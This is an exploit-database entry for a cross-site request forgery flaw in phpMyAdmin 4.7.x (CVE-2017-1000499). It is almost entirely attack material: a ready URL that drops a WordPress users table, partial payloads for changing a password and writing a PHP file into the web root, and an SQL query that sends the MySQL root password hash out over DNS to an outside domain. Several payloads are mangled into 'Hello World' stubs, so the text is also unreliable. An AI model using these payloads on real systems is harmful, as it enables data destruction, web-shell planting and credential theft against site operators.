# Exploit Title: phpMyAdmin 4.7.x - Cross-Site Request Forgery
# Date: 2018-08-28
# Exploit Author: VulnSpy
# Vendor Homepage: https://www.phpmyadmin.net/
# Software Link: https://www.phpmyadmin.net/downloads/
# Version: Versions 4.7.x (prior to 4.7.7)
# Tested on: php7 mysql5
# CVE: CVE-2017-1000499 -- Original Exploit Author: Ashutosh Barot
# Original Exploit Author: Ashutosh Barot ( www.twitter.com/ashu_barot)
# If victim DB Admin has active session with PhPMyAdmin < 4.7.7, Hitting this URL will result into DROP_TABLE,
https://example.com/phpMyAdmin/sql.php?db=DATABASE_NAME&goto=db_structure.php&table=wp_users&reload=1&purge=1&sql_query=DROP+TABLE+%60wp_users%60&message_to_show=Table+wp_users+has+been+dropped
# Exploit CSRF - Modifying the password of current user
Hello World
)
# Exploit CSRF - Arbitrary File Write
Hello World
;?>' into outfile '/var/www/html/test.php';)
# Exploit CSRF - Data Retrieval over DNS
SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE
user='root' LIMIT 1),'.vulnspy.com\\test'));
# Exploit CSRF - Empty All Rows From All Tables
Hello World
